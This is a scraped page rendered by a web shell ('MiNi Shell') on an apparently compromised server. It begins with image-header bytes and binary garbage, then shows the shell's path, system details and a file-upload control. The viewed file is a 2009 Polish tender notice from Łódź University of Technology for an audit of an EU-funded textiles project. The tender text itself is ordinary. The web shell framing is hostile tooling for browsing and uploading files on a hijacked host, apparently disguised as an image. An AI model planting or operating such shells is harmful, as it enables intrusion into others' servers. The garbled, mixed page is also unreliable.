JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090805/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090805/127667-N-2009.html

<p class="kh_header"><b>Łódź: Usługa audytu zewnętrznego w ramach projektu kluczowego  Nr POIG 01.03.01-00-007/08-00 pn.Biodegradowalne wyroby włókniste</b><br>
<b>Numer ogłoszenia: 127667 - 2009; data zamieszczenia: 05.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wydział Technologii Materiałowych i Wzornictwa Tekstyliów Politechniki Łódzkiej , ul. Żeromskiego 116, 90-924 Łódź, woj. łódzkie, tel. 042 631 33 00, faks 042 631 33 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.style.p.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa audytu zewnętrznego w ramach projektu kluczowego  Nr POIG 01.03.01-00-007/08-00 pn.Biodegradowalne wyroby włókniste.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa audytu zewnętrznego w ramach projektu kluczowego  Nr POIG 01.03.01-00-007/08-00 pn.Biodegradowalne wyroby włókniste
a) Przedmiot zamówienia według klasyfikacji CPV:79212000-3 - Usługi audytu
W ramach zamówienia przeprowadzony zostanie audyt zewnętrzny projektu ppn. Biodegradowalne wyroby włókniste., realizowanego w ramach: Działania 1.3 - Wsparcie projektów B+R na rzecz przedsiębiorców realizowanych przez jednostki naukowePoddziałania 1.3.1 - Projekty rozwojowe Programu Operacyjnego Innowacyjna Gospodarka    
b) Głównym celem zamówienia jest uzyskanie zapewnienia o prawidłowości realizacji projektu realizowanego w ramach Działania 1.3 - Wsparcie projektów B+R na rzecz przedsiębiorców realizowanych przez jednostki naukowe, Poddziałania 1.3.1 - Projekty rozwojowe Programu Operacyjnego Innowacyjna Gospodarka oraz zapewnienia o wiarygodności informacji prezentowanych we wnioskach o płatność.
c) Przedmiotem zamówienia jest przeprowadzenie usługi audytu zewnętrznego projektu realizowanego w ramach Działania 1.3 - Wsparcie projektów B+R na rzecz przedsiębiorców realizowanych przez jednostki naukowe, Poddziałania  1.3.1 - Projekty rozwojowe Programu Operacyjnego Innowacyjna Gospodarka o nazwie pn.Biodegradowalne wyroby włókniste. Wykonawca zobowiązany jest przeprowadzić audyt zewnętrzny, który w szczególności będzie uwzględniał:
- audyt wniosków o płatność obejmujący w szczególności następujące działania:
1.Zbadanie kwalifikowalności wydatków poniesionych przez  Lidera, Partnerów Projektu i Partnerów Stowarzyszonych w ramach realizowanego projektu na podstawie obowiązujących w tym zakresie przepisów oraz wytycznych MRR
2.Zbadanie prawidłowości prowadzenia wyodrębnionej ewidencji księgowej przez Lidera, Partnerów Projektu i Partnerów Stowarzyszonych dotyczącej realizowanego projektu na podstawie obowiązujących w tym zakresie przepisów oraz wytycznych MRR.
- audyt zgodności realizacji projektu z umową o dofinansowanie realizacji projektu oraz złożonym wnioskiem o dofinansowanie,
- weryfikacja osiągniętych wskaźników produktu i wskaźników rezultatu
d) Liczba technik audytu, które będą zastosowane podczas realizacji audytuW propozycji technicznej oferty Wykonawca powinien zaproponować liczbę technik audytu, które będą zastosowane podczas realizacji audytu oraz ścieżkę audytową. Ze strony Zamawiającego w wersji elektronicznej i  zostaną dostarczone wszystkie dokumenty, o które pisemnie lub ustnie wystąpią audytorzy, a związane z realizacją audytowanego projektu. Podczas realizacji audytu powinna zostać zweryfikowana całość lub próbka  ogółem poniesionych wydatków, a także pozostałej dokumentacji powstałej w ramach realizacji zadań, która pozwoli wydać audytorowi opinię w sprawie prawidłowości realizacji
e) Sposób i terminy przedstawiania wyników audytu zewnętrznegoWykonawca jest zobowiązany do przedstawienia Zamawiającemu, opracowanych w języku polskim, sprawozdania wstępnego oraz opinii i sprawozdania końcowego.W pierwszej fazie realizacji zamówienia, po zapoznaniu się z dostępną dokumentacją oraz spotkaniu z Zamawiającym, Wykonawca zobowiązuje się przygotować dokument, w którym w sposób szczegółowy będzie opisywać metodologię oraz harmonogram prowadzenia ścieżki audytowej. Dokument ten zostanie przedłożony Zamawiającemu nie później niż w terminie 7 dni roboczych od dnia podpisania umowy pomiędzy Zamawiającym i Wykonawcą. Powyżej wskazany dokument po zatwierdzeniu przez Zamawiającego będzie podstawą do rozpoczęcia audytu zewnętrznego.Po zakończeniu zbierania danych niezbędnych do przeprowadzenia audytu i po dokonaniu ich analizy, Wykonawca przedłoży Zamawiającemu 1 egzemplarz sprawozdania wstępnego, do którego Zamawiający ma prawo odnieść się w terminie 7 dni roboczych od dnia jego dostarczenia przez Wykonawcę. Po analizie uwag Zamawiającego w czasie potrzebnym do ich zbadania,  Wykonawca zobowiązany jest dostarczyć 3 egzemplarze opinii i sprawozdania końcowego zgodnie z obowiązującymi terminami.Zamawiający zastrzega sobie prawo do kontroli i oceny realizacji audytu zewnętrznego na każdym jego etapie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagana wpłata wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy
1.Złożą oświadczenie, że znajdują się w sytuacji ekonomicznej, finansowej i technicznej zapewniającej wykonanie zamówienia. 
2.Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy prawo zamówień publicznych.
3.Posiadają potencjał techniczny i dysponują co najmniej 3 osobami posiadającymi niezbędną wiedzę i doświadczenie, zdolnymi do wykonania zamówienia: W skład minimum trzyosobowego zespołu wykonującego audyt zewnętrzny muszą obligatoryjnie wchodzić minimum dwie osoby posiadające uprawnienia audytora wewnętrznego zgodnie z wymogami ustawy z dnia 30 czerwca 2005r o finansach publicznych (Dz.U. z 2005 Nr 249 poz. 2104 ze zm.) oraz art. 23 Ustawy z 8 grudnia 2006 o zmianie Ustawy o finansach publicznych (Dz.U. z 2006 Nr 249 poz. 1832)
4.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj: 
a) w zakresie osób które będą uczestniczyć w wykonywaniu zamówienia wykażą wiedzę i doświadczenie, że:
.członkowie zespołu audytowego, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, przeprowadzili łącznie z należytą starannością co najmniej 5 usług audytu projektów współfinansowanych z funduszy unijnych, przeprowadzanych zgodnie z międzynarodowymi Standardami Profesjonalnej Praktyki Audytu Wewnętrznego w jednostkach sektora finansów publicznych o łącznej wartości minimum 10 mln zł, w tym jeden o wartości min. 5 mln zł oraz posiadają dokumenty potwierdzające, że prace te zostały wykonane należycie; 
. w zakresie osób które będą uczestniczyć w wykonywaniu zamówienia wykażą dysponowaniem lub oświadczeniem o możliwości dysponowania następującymi osobami wykonującymi określone niżej czynności i posiadającymi minimalne kompetencje:minimum trzyosobowy zespół audytorski ma składać się z co najmniej dwóch  osób posiadających uprawnienia audytora tj,:
- osoby, która posiada uprawnienia biegłego rewidenta, zgodnie z ustawą z dnia 13 października 2004 r. o biegłych rewidentach i ich samorządzie Dz. U. z 2001 r., Nr 31, poz. 359 z późn. zm.), i
- osoby posiadającej uprawnienia audytora wewnętrznego, zgodnie z ustawą z dnia 30 czerwca 2005 r. o finansach publicznych (Dz. U. z 2005 r., Nr 249, poz. 2104 z późn. zm.). oraz w art. 23 Ustawy z dnia 8 grudnia 2006 r. o zmianie ustawy o finansach publicznych oraz niektórych innych ustaw (Dz.U. z 2006 Nr 249 poz. 1832)
5.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w złożonych wraz z ofertą dokumentach na zasadzie spełnia / nie spełnia.
Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, lub którzy złożyli dokumenty zawierające błędy do ich uzupełnienie zgodnie z art.26 ustawy PZP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków wymaganych w niniejszym przetargu każdy z Wykonawców zobowiązany jest złożyć następujące dokumenty:
1. ZAŁĄCZNIK 2 -  wypełnione i podpisane - Oświadczenie wykonawcy-,stanowiące Załącznik  nr. 2 do niniejszej SIWZ
2. ZAŁĄCZNIK 3  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3. ZAŁĄCZNIK 4 -  aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. ZAŁĄCZNIK 5 -  wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia według wzoru stanowiącego Załącznik Nr 3 do SIWZ wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności według wzoru stanowiącego Załącznik Nr 4 do SIWZ oraz dokumenty potwierdzające kwalifikacje zawodowe, o których mowa w pkt 4Wykaz ma zawierać minimum trzy osoby stanowiące zespół audytorski, posiadające wiedzę z zakresu funkcjonowania funduszy unijnych, w szczególności w obszarze ich audytowania w tym minimum 2 osoby posiadające następujące uprawnienia i kwalifikacje:- biegły rewident posiadający uprawnienia określone w ustawie z dnia 13 października 2004 r. o biegłych rewidentach i ich samorządzie Dz. U. z 2001 r., Nr 31, poz. 359 z późn. zm.), i
- audytor wewnętrzny posiadający uprawnienia określone w ustawie z dnia 30 czerwca 2005 r. o finansach publicznych (Dz. U. z 2005 r., Nr 249, poz. 2104 z późn. zm.) oraz w art.23 Ustawy z dnia 8 grudnia 2006 r. o zmianie ustawy o finansach publicznych oraz niektórych innych ustaw (Dz.U. z 2006 Nr 249 poz. 1832)
- członkowie zespołu audytowego, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, przeprowadzili łącznie z należytą starannością co najmniej 5 usług audytu projektów współfinansowanych z funduszy unijnych, przeprowadzanych zgodnie z międzynarodowymi Standardami Profesjonalnej Praktyki Audytu Wewnętrznego w jednostkach sektora finansów publicznych o łącznej wartości minimum 10 mln zł, w tym jeden o wartości min. 5 mln zł oraz posiadają dokumenty potwierdzające, że prace te zostały wykonane należycie
- pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie o którym mowa w pkt 5 wykonawca wskazał osoby którymi będzie dysponował.        
5. ZAŁACZNIK 6 -  potwierdzenie przyjęcia istotnych warunków umowy poprzez podpis na każdej ze stron zestawienia tych warunków, stanowiącego załącznik nr. 5 do niniejszej SIWZ.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów o których mowa w p.4 składa dokumenty zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców, oraz form, w jakich te dokumenty mogą być składane.Potencjalni Wykonawcy z innych państw członkowskich Unii Europejskiej mogą składać dokumenty równoważne polskim dokumentom wymaganym przez Zamawiającego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 65</li>
<li>2 - Liczba technik audytu - 25</li>
<li>3 - Sposób doboru próby - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zp.p.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Łódzka, Wydział Technologii Materiałowych i Wzornictwa  Tekstyliów, Dziekanat Wydziału, Budynek A33, II p. pokój 230, ul. Żeromskiego  nr 116, 90 - 924 Łódź.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 12:00, miejsce: Politechnika Łódzka, Wydział Technologii Materiałowych i Wzornictwa  Tekstyliów, Dziekanat Wydziału, Budynek A33, II p. pokój 230, ul. Żeromskiego  nr 116, 90 - 924 Łódź.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com